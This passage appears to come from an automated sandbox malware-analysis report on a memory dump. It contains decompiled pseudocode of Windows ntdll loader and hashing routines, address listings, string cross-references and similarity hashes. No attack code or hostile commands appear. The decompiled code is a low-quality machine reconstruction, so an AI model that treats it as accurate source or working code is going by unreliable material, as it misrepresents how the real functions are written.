							}
						}
					}
					if(( *0x1e335780 & 0x00000005) != 0) {
						_push(_t49);
						E1E2C5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                  0x1e278e0f
                                                  0x1e278e16
                                                  0x1e278e19
                                                  0x1e278e1b
                                                  0x1e278e21
                                                  0x1e278e7f
                                                  0x1e278e85
                                                  0x1e2b9354
                                                  0x1e2b936c
                                                  0x1e2b9371
                                                  0x1e2b937b
                                                  0x1e2b9381
                                                  0x1e2b9381
                                                  0x1e2b937b
                                                  0x1e278e9d
                                                  0x1e278e9d
                                                  0x1e278e29
                                                  0x1e278e2c
                                                  0x1e278e38
                                                  0x1e278e3e
                                                  0x1e278e43
                                                  0x1e278eb5
                                                  0x1e278eb9
                                                  0x1e2b92aa
                                                  0x1e2b92af
                                                  0x1e2b92e8
                                                  0x1e2b92e8
                                                  0x1e2b92af
                                                  0x1e278eb9
                                                  0x1e278e45
                                                  0x1e278e53
                                                  0x1e278e5b
                                                  0x1e278e5f
                                                  0x1e278e78
                                                  0x1e278e78
                                                  0x1e278e7d
                                                  0x1e278ec3
                                                  0x1e278ecd
                                                  0x1e278ed2
                                                  0x1e278ed2
                                                  0x1e278ec5
                                                  0x1e278ec5
                                                  0x00000000
                                                  0x1e278e7d
                                                  0x1e278e67
                                                  0x1e278ea4
                                                  0x1e2b931a
                                                  0x00000000
                                                  0x00000000
                                                  0x1e2b9320
                                                  0x1e278ea4
                                                  0x1e278e70
                                                  0x1e2b9325
                                                  0x1e2b9340
                                                  0x1e2b9345
                                                  0x1e2b9345
                                                  0x1e278e76
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  Strings
                                                  • LdrpFindDllActivationContext, xrefs: 1E2B9331, 1E2B935D
                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 1E2B933B, 1E2B9367
                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E2B932A
                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 1E2B9357
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.312378278.000000001E220000.00000040.00000001.sdmp, Offset: 1E220000, based on PE: true
                                                  • Associated: 00000001.00000002.312548721.000000001E33B000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 3446177414-3779518884
                                                  • Opcode ID: ded60933108f8dd3a610eaac48f9f79514909adc7339e63218875e39c9bda1b2
                                                  • Instruction ID: 6dd3975fb943bc823b37c8d44af5e529f9562151af081b6ddedd56e1ee5f6dfa
                                                  • Opcode Fuzzy Hash: ded60933108f8dd3a610eaac48f9f79514909adc7339e63218875e39c9bda1b2
                                                  • Instruction Fuzzy Hash: 64410932E103779FD7199A14C8B8F5AF2A6BB643D4F264769F90897191E7F0AD80C281
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1E31E824, Relevance: 6.5, APIs: 4, Instructions: 493timeCOMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 50%
                                                  			E1E31E824(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t179;
				unsigned int _t202;
				signed char _t207;
				signed char _t210;
				signed int _t230;
				void* _t244;
				unsigned int _t247;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed char _t293;
				signed char _t295;
				signed char _t298;
				intOrPtr* _t303;
				signed int _t310;
				signed char _t316;
				signed int _t319;
				signed char _t323;
				signed char _t330;
				signed int _t334;
				signed int _t337;
				signed int _t341;
				signed char _t345;
				signed char _t347;
				signed int _t353;
				signed char _t354;
				void* _t383;
				signed char _t385;
				signed char _t386;
				unsigned int _t392;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t401;
				unsigned int _t403;
				void* _t404;
				unsigned int _t405;
				signed int _t406;
				signed char _t412;
				unsigned int _t413;
				unsigned int _t418;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				signed char* _t425;
				signed int _t426;
				signed int _t428;
				unsigned int _t430;
				signed int _t431;
				signed int _t433;

				_v8 =  *0x1e33d360 ^ _t433;
				_v40 = __ecx;
				_v16 = __edx;
				_t289 = 0x4cb2f;
				_t425 = __edx[1];
				_t403 =  *__edx << 2;
				if(_t403 < 8) {
					L3:
					_t404 = _t403 - 1;
					if(_t404 == 0) {
						L16:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						L17:
						_t426 = _v40;
						_v20 = _t426 + 0x1c;
						_t177 = L1E26FAD0(_t426 + 0x1c);
						_t385 = 0;
						while(1) {
							L18:
							_t405 =  *(_t426 + 4);
							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
							_t316 = _t289 & _t179;
							_v24 = _t179;
							_v32 = _t316;
							_v12 = _t316 >> 0x18;
							_v36 = _t316 >> 0x10;
							_v28 = _t316 >> 8;
							if(_t385 != 0) {
								goto L21;
							}
							_t418 = _t405 >> 5;
							if(_t418 == 0) {
								_t406 = 0;
								L31:
								if(_t406 == 0) {
									L35:
									E1E26FA00(_t289, _t316, _t406, _t426 + 0x1c);
									 *0x1e33b1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
									_v36 = _t319;
									if(_t319 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t408 = _v16;
										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t319 + 0xb)) =  *_v16;
										 *(_t319 + 4) = _t289;
										_t53 = _t319 + 0xc; // 0xc
										E1E262280(E1E28F3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
										_t428 = _v40;
										_t386 = 0;
										while(1) {
											L38:
											_t202 =  *(_t428 + 4);
											_v16 = _v16 | 0xffffffff;
											_v16 = _v16 << (_t202 & 0x0000001f);
											_t323 = _v16 & _t289;
											_v20 = _t323;
											_v20 = _v20 >> 0x18;
											_v28 = _t323;
											_v28 = _v28 >> 0x10;
											_v12 = _t323;
											_v12 = _v12 >> 8;
											_v32 = _t323;
											if(_t386 != 0) {
												goto L41;
											}
											_t247 = _t202 >> 5;
											_v24 = _t247;
											if(_t247 == 0) {
												_t412 = 0;
												L50:
												if(_t412 == 0) {
													L53:
													_t291 =  *(_t428 + 4);
													_v28 =  *((intOrPtr*)(_t428 + 0x28));
													_v44 =  *(_t428 + 0x24);
													_v32 =  *((intOrPtr*)(_t428 + 0x20));
													_t207 = _t291 >> 5;
													if( *_t428 < _t207 + _t207) {
														L74:
														_t430 = _t291 >> 5;
														_t293 = _v36;
														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
														_v44 = _t210;
														_t159 = _t430 - 1; // 0xffffffdf
														_t428 = _v40;
														_t330 =  *(_t428 + 8);
														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
														_t412 = _t293;
														 *_t293 =  *(_t330 + _t386 * 4);
														 *(_t330 + _t386 * 4) = _t293;
														 *_t428 =  *_t428 + 1;
														_t289 = 0;
														L75:
														E1E25FFB0(_t289, _t412, _t428 + 0x1c);
														if(_t289 != 0) {
															_t428 =  *(_t428 + 0x24);
															 *0x1e33b1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
															 *_t428();
														}
														L77:
														return E1E28B640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
													}
													_t334 = 2;
													_t207 = E1E27F3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
													if(_t207 < 0) {
														goto L74;
													}
													_t413 = _v24;
													if(_t413 < 4) {
														_t413 = 4;
													}
													 *0x1e33b1e0(_t413 << 2, _v28);
													_t207 =  *_v32();
													_t386 = _t207;
													_v16 = _t386;
													if(_t386 == 0) {
														_t291 =  *(_t428 + 4);
														if(_t291 >= 0x20) {
															goto L74;
														}
														_t289 = _v36;
														_t412 = 0;
														goto L75;
													} else {
														_t108 = _t413 - 1; // 0x3
														_t337 = _t108;
														if((_t413 & _t337) == 0) {
															L62:
															if(_t413 > 0x4000000) {
																_t413 = 0x4000000;
															}
															_t295 = _t386;
															_v24 = _v24 & 0x00000000;
															_t392 = _t413 << 2;
															_t230 = _t428 | 0x00000001;
															_t393 = _t392 >> 2;
															asm("sbb ecx, ecx");
															_t341 =  !(_v16 + _t392) & _t393;
															if(_t341 <= 0) {
																L67:
																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
																_v32 = _t395;
																_v20 = 0;
																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
																	L72:
																	_t345 =  *(_t428 + 8);
																	_t207 = _v16;
																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
																	 *(_t428 + 8) = _t207;
																	 *(_t428 + 4) = _t291;
																	if(_t345 != 0) {
																		 *0x1e33b1e0(_t345, _v28);
																		_t207 =  *_v44();
																		_t291 =  *(_t428 + 4);
																	}
																	goto L74;
																} else {
																	goto L68;
																}
																do {
																	L68:
																	_t298 =  *(_t428 + 8);
																	_t431 = _v20;
																	_v12 = _t298;
																	while(1) {
																		_t347 =  *(_t298 + _t431 * 4);
																		_v24 = _t347;
																		if((_t347 & 0x00000001) != 0) {
																			goto L71;
																		}
																		 *(_t298 + _t431 * 4) =  *_t347;
																		_t300 =  *(_t347 + 4) & _t395;
																		_t398 = _v16;
																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																		_t303 = _v24;
																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
																		_t395 = _v32;
																		_t298 = _v12;
																	}
																	L71:
																	_v20 = _t431 + 1;
																	_t428 = _v40;
																} while (_v20 <  *(_t428 + 4) >> 5);
																goto L72;
															} else {
																_t399 = _v24;
																do {
																	_t399 = _t399 + 1;
																	 *_t295 = _t230;
																	_t295 = _t295 + 4;
																} while (_t399 < _t341);
																goto L67;
															}
														}
														_t354 = _t337 | 0xffffffff;
														if(_t413 == 0) {
															L61:
															_t413 = 1 << _t354;
															goto L62;
														} else {
															goto L60;
														}
														do {
															L60:
															_t354 = _t354 + 1;
															_t413 = _t413 >> 1;
														} while (_t413 != 0);
														goto L61;
													}
												}
												_t89 = _t412 + 8; // 0x8
												_t244 = E1E31E7A8(_t89);
												_t289 = _v36;
												if(_t244 == 0) {
													_t412 = 0;
												}
												goto L75;
											}
											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
											_t323 = _v32;
											while(1) {
												L41:
												_t386 =  *_t386;
												_v12 = _t386;
												if((_t386 & 0x00000001) != 0) {
													break;
												}
												if(_t323 == ( *(_t386 + 4) & _v16)) {
													L45:
													if(_t386 == 0) {
														goto L53;
													}
													if(E1E31E7EB(_t386, _t408) != 0) {
														_t412 = _v12;
														goto L50;
													}
													_t386 = _v12;
													goto L38;
												}
											}
											_t386 = 0;
											_v12 = 0;
											goto L45;
										}
									}
									_t412 = 0;
									goto L77;
								}
								_t38 = _t406 + 8; // 0x8
								_t364 = _t38;
								if(E1E31E7A8(_t38) == 0) {
									_t406 = 0;
								}
								E1E26FA00(_t289, _t364, _t406, _v20);
								goto L77;
							}
							_t24 = _t418 - 1; // -1
							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
							_t316 = _v32;
							L21:
							_t406 = _v24;
							while(1) {
								_t385 =  *_t385;
								_v12 = _t385;
								if((_t385 & 0x00000001) != 0) {
									break;
								}
								if(_t316 == ( *(_t385 + 4) & _t406)) {
									L26:
									if(_t385 == 0) {
										goto L35;
									}
									_t177 = E1E31E7EB(_t385, _v16);
									if(_t177 != 0) {
										_t406 = _v12;
										goto L31;
									}
									_t385 = _v12;
									goto L18;
								}
							}
							_t385 = 0;
							_v12 = 0;
							goto L26;
						}
					}
					_t419 = _t404 - 1;
					if(_t419 == 0) {
						L15:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L16;
					}
					_t420 = _t419 - 1;
					if(_t420 == 0) {
						L14:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L15;
					}
					_t421 = _t420 - 1;
					if(_t421 == 0) {
						L13:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L14;
					}
					_t422 = _t421 - 1;
					if(_t422 == 0) {
						L12:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L13;
					}
					_t423 = _t422 - 1;
					if(_t423 == 0) {
						L11:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L12;
					}
					if(_t423 != 1) {
						goto L17;
					} else {
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L11;
					}
				} else {
					_t401 = _t403 >> 3;
					_t403 = _t403 + _t401 * 0xfffffff8;
					do {
						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
						_t288 = _t425[7] & 0x000000ff;
						_t425 =  &(_t425[8]);
						_t289 = _t310 + _t383 + _t288;
						_t401 = _t401 - 1;
					} while (_t401 != 0);
					goto L3;
				}
			}






































































                                                  0x1e31e833
                                                  0x1e31e839
                                                  0x1e31e83e
                                                  0x1e31e841
                                                  0x1e31e848
                                                  0x1e31e84b
                                                  0x1e31e851
                                                  0x1e31e8b2
                                                  0x1e31e8b2
                                                  0x1e31e8b5
                                                  0x1e31e90b
                                                  0x1e31e911
                                                  0x1e31e913
                                                  0x1e31e913
                                                  0x1e31e91a
                                                  0x1e31e91d
                                                  0x1e31e922
                                                  0x1e31e924
                                                  0x1e31e924
                                                  0x1e31e924
                                                  0x1e31e92f
                                                  0x1e31e933
                                                  0x1e31e935
                                                  0x1e31e93a
                                                  0x1e31e940
                                                  0x1e31e948
                                                  0x1e31e950
                                                  0x1e31e955
                                                  0x00000000
                                                  0x00000000
                                                  0x1e31e957
                                                  0x1e31e95c
                                                  0x1e31e9cb
                                                  0x1e31e9d2
                                                  0x1e31e9d4
                                                  0x1e31e9f2
                                                  0x1e31e9f6
                                                  0x1e31ea10
                                                  0x1e31ea18
                                                  0x1e31ea1a
                                                  0x1e31ea1f
                                                  0x1e31ea2c
                                                  0x1e31ea2d
                                                  0x1e31ea2e
                                                  0x1e31ea32
                                                  0x1e31ea3d
                                                  0x1e31ea42
                                                  0x1e31ea45
                                                  0x1e31ea51
                                                  0x1e31ea60
                                                  0x1e31ea65
                                                  0x1e31ea68
                                                  0x1e31ea6a
                                                  0x1e31ea6a
                                                  0x1e31ea6a
                                                  0x1e31ea6f
                                                  0x1e31ea76
                                                  0x1e31ea7c
                                                  0x1e31ea7e
                                                  0x1e31ea81
                                                  0x1e31ea85
                                                  0x1e31ea88
                                                  0x1e31ea8c
                                                  0x1e31ea8f
                                                  0x1e31ea93
                                                  0x1e31ea98
                                                  0x00000000
                                                  0x00000000
                                                  0x1e31ea9a
                                                  0x1e31ea9d
                                                  0x1e31eaa2
                                                  0x1e31eb0e
                                                  0x1e31eb15
                                                  0x1e31eb17
                                                  0x1e31eb33
                                                  0x1e31eb36
                                                  0x1e31eb39
                                                  0x1e31eb3f
                                                  0x1e31eb45
                                                  0x1e31eb4a
                                                  0x1e31eb52
                                                  0x1e31ecb1
                                                  0x1e31ecb9
                                                  0x1e31ecbe
                                                  0x1e31ecc3
                                                  0x1e31ecc6
                                                  0x1e31eceb
                                                  0x1e31ecee
                                                  0x1e31ecf9
                                                  0x1e31ecfe
                                                  0x1e31ed00
                                                  0x1e31ed05
                                                  0x1e31ed07
                                                  0x1e31ed0a
                                                  0x1e31ed0c
                                                  0x1e31ed0e
                                                  0x1e31ed12
                                                  0x1e31ed19
                                                  0x1e31ed1e
                                                  0x1e31ed24
                                                  0x1e31ed2a
                                                  0x1e31ed2a
                                                  0x1e31ed2c
                                                  0x1e31ed3e
                                                  0x1e31ed3e
                                                  0x1e31eb5a
                                                  0x1e31eb62
                                                  0x1e31eb69
                                                  0x00000000
                                                  0x00000000
                                                  0x1e31eb6f
                                                  0x1e31eb75
                                                  0x1e31eb79
                                                  0x1e31eb79
                                                  0x1e31eb88
                                                  0x1e31eb8e
                                                  0x1e31eb90
                                                  0x1e31eb92
                                                  0x1e31eb97
                                                  0x1e31ed3f
                                                  0x1e31ed45
                                                  0x00000000
                                                  0x00000000
                                                  0x1e31ed4b
                                                  0x1e31ed4e
                                                  0x00000000
                                                  0x1e31eb9d
                                                  0x1e31eb9d
                                                  0x1e31eb9d
                                                  0x1e31eba2
                                                  0x1e31ebb5
                                                  0x1e31ebbc
                                                  0x1e31ebbe
                                                  0x1e31ebbe
                                                  0x1e31ebc3
                                                  0x1e31ebc5
                                                  0x1e31ebcb
                                                  0x1e31ebd2
                                                  0x1e31ebd5
                                                  0x1e31ebdb
                                                  0x1e31ebdf
                                                  0x1e31ebe1
                                                  0x1e31ebf0
                                                  0x1e31ebf9
                                                  0x1e31ec04
                                                  0x1e31ec07
                                                  0x1e31ec0a
                                                  0x1e31ec82
                                                  0x1e31ec85
                                                  0x1e31ec8b
                                                  0x1e31ec91
                                                  0x1e31ec93
                                                  0x1e31ec96
                                                  0x1e31ec9b
                                                  0x1e31eca6
                                                  0x1e31ecac
                                                  0x1e31ecae
                                                  0x1e31ecae
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x1e31ec0c
                                                  0x1e31ec0c
                                                  0x1e31ec0c
                                                  0x1e31ec0f
                                                  0x1e31ec12
                                                  0x1e31ec15
                                                  0x1e31ec15
                                                  0x1e31ec18
                                                  0x1e31ec1e
                                                  0x00000000
                                                  0x00000000
                                                  0x1e31ec22
                                                  0x1e31ec28
                                                  0x1e31ec4b
                                                  0x1e31ec5b
                                                  0x1e31ec5d
                                                  0x1e31ec63
                                                  0x1e31ec65
                                                  0x1e31ec68
                                                  0x1e31ec6b
                                                  0x1e31ec6b
                                                  0x1e31ec70
                                                  0x1e31ec71
                                                  0x1e31ec74
                                                  0x1e31ec7d
                                                  0x00000000
                                                  0x1e31ebe3
                                                  0x1e31ebe3
                                                  0x1e31ebe6
                                                  0x1e31ebe6
                                                  0x1e31ebe7
                                                  0x1e31ebe9
                                                  0x1e31ebec
                                                  0x00000000
                                                  0x1e31ebe6
                                                  0x1e31ebe1
                                                  0x1e31eba4
                                                  0x1e31eba9
                                                  0x1e31ebb0
                                                  0x1e31ebb3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x1e31ebab
                                                  0x1e31ebab
                                                  0x1e31ebab
                                                  0x1e31ebac
                                                  0x1e31ebac
                                                  0x00000000
                                                  0x1e31ebab
                                                  0x1e31eb97
                                                  0x1e31eb19
                                                  0x1e31eb1c
                                                  0x1e31eb21
                                                  0x1e31eb26
                                                  0x1e31eb2c
                                                  0x1e31eb2c
                                                  0x00000000
                                                  0x1e31eb26
                                                  0x1e31ead6
                                                  0x1e31ead9
                                                  0x1e31eadc
                                                  0x1e31eadc
                                                  0x1e31eadc
                                                  0x1e31eade
                                                  0x1e31eae4
                                                  0x00000000
                                                  0x00000000
                                                  0x1e31eaee
                                                  0x1e31eaf7
                                                  0x1e31eaf9
                                                  0x00000000
                                                  0x00000000
                                                  0x1e31eb04
                                                  0x1e31eb12
                                                  0x00000000
                                                  0x1e31eb12
                                                  0x1e31eb06
                                                  0x00000000
                                                  0x1e31eb06
                                                  0x1e31eaf0
                                                  0x1e31eaf2
                                                  0x1e31eaf4
                                                  0x00000000
                                                  0x1e31eaf4
                                                  0x1e31ea6a
                                                  0x1e31ea21
                                                  0x00000000
                                                  0x1e31ea21
                                                  0x1e31e9d6
                                                  0x1e31e9d6
                                                  0x1e31e9e0
                                                  0x1e31e9e2
                                                  0x1e31e9e2
                                                  0x1e31e9e8
                                                  0x00000000
                                                  0x1e31e9e8
                                                  0x1e31e987
                                                  0x1e31e98f
                                                  0x1e31e992
                                                  0x1e31e995
                                                  0x1e31e995
                                                  0x1e31e998
                                                  0x1e31e998
                                                  0x1e31e99a
                                                  0x1e31e9a0
                                                  0x00000000
                                                  0x00000000
                                                  0x1e31e9a9
                                                  0x1e31e9b2
                                                  0x1e31e9b4
                                                  0x00000000
                                                  0x00000000
                                                  0x1e31e9ba
                                                  0x1e31e9c1
                                                  0x1e31e9cf
                                                  0x00000000
                                                  0x1e31e9cf
                                                  0x1e31e9c3
                                                  0x00000000
                                                  0x1e31e9c3
                                                  0x1e31e9ab
                                                  0x1e31e9ad
                                                  0x1e31e9af
                                                  0x00000000
                                                  0x1e31e9af
                                                  0x1e31e924
                                                  0x1e31e8b7
                                                  0x1e31e8ba
                                                  0x1e31e902
                                                  0x1e31e908
                                                  0x1e31e90a
                                                  0x00000000
                                                  0x1e31e90a
                                                  0x1e31e8bc
                                                  0x1e31e8bf
                                                  0x1e31e8f9
                                                  0x1e31e8ff
                                                  0x1e31e901
                                                  0x00000000
                                                  0x1e31e901
                                                  0x1e31e8c1
                                                  0x1e31e8c4
                                                  0x1e31e8f0
                                                  0x1e31e8f6
                                                  0x1e31e8f8
                                                  0x00000000
                                                  0x1e31e8f8
                                                  0x1e31e8c6
                                                  0x1e31e8c9
                                                  0x1e31e8e7
                                                  0x1e31e8ed
                                                  0x1e31e8ef
                                                  0x00000000
                                                  0x1e31e8ef
                                                  0x1e31e8cb
                                                  0x1e31e8ce
                                                  0x1e31e8de
                                                  0x1e31e8e4
                                                  0x1e31e8e6
                                                  0x00000000
                                                  0x1e31e8e6
                                                  0x1e31e8d3
                                                  0x00000000
                                                  0x1e31e8d5
                                                  0x1e31e8db
                                                  0x1e31e8dd
                                                  0x00000000
                                                  0x1e31e8dd
                                                  0x1e31e853
                                                  0x1e31e855
                                                  0x1e31e85b
                                                  0x1e31e85d
                                                  0x1e31e897
                                                  0x1e31e89c
                                                  0x1e31e8a2
                                                  0x1e31e8a6
                                                  0x1e31e8ab
                                                  0x1e31e8ad
                                                  0x1e31e8ad
                                                  0x00000000
                                                  0x1e31e85d

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.312378278.000000001E220000.00000040.00000001.sdmp, Offset: 1E220000, based on PE: true
                                                  • Associated: 00000001.00000002.312548721.000000001E33B000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: b697118f682c344318db82b74020512bee49164d6e13a216d8cb5643acc782b1
                                                  • Instruction ID: 3742f846bcc3793fc68d88a4c98f37de7a6b3ee9233b201ee7490be01892ceaa
                                                  • Opcode Fuzzy Hash: b697118f682c344318db82b74020512bee49164d6e13a216d8cb5643acc782b1
                                                  • Instruction Fuzzy Hash: 1602B572E006168FCB1CCFAAC89167EBBF6AF88200755866DE456DB381D735E941CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1E27645B, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 26%
                                                  			E1E27645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1e33d360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E1E28FA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E1E262280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E1E25FFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x1e33b1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E1E28B640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}


































                                                  0x1e27645b
                                                  0x1e276463
                                                  0x1e27646d
                                                  0x1e276475
                                                  0x1e27647a
                                                  0x1e27647e
                                                  0x1e276480
                                                  0x1e27648c
                                                  0x1e276490
                                                  0x1e276495
                                                  0x1e276498
                                                  0x1e27649b
                                                  0x1e27649f
                                                  0x1e2764a1
                                                  0x1e2b7c07
                                                  0x1e2b7c09
                                                  0x1e2b7c0c
                                                  0x00000000
                                                  0x1e2764a7
                                                  0x1e2764a7
                                                  0x1e2764aa
                                                  0x1e2b7bf7
                                                  0x1e2b7c00
                                                  0x00000000
                                                  0x1e2b7bf9
                                                  0x1e2b7bf9
                                                  0x1e2b7bf9
                                                  0x1e2764b0
                                                  0x1e2764b0
                                                  0x1e2764b2
                                                  0x1e2764b2
                                                  0x1e2764b3
                                                  0x1e2764ba
                                                  0x1e276553
                                                  0x1e27655e
                                                  0x1e276566
                                                  0x1e27656c
                                                  0x1e276575
                                                  0x1e27657f
                                                  0x1e276585
                                                  0x1e276588
                                                  0x1e276588
                                                  0x1e2764c7
                                                  0x1e2764cb
                                                  0x1e2764ce
                                                  0x1e2764d3
                                                  0x1e2764da
                                                  0x1e2764e5
                                                  0x1e2764ed
                                                  0x1e2764f1
                                                  0x1e2764f5
                                                  0x1e2764f6
                                                  0x1e2764fa
                                                  0x1e276502
                                                  0x1e276503
                                                  0x1e276504
                                                  0x1e276507
                                                  0x1e27651a
                                                  0x1e276524
                                                  0x1e276524
                                                  0x1e276526
                                                  0x1e276526
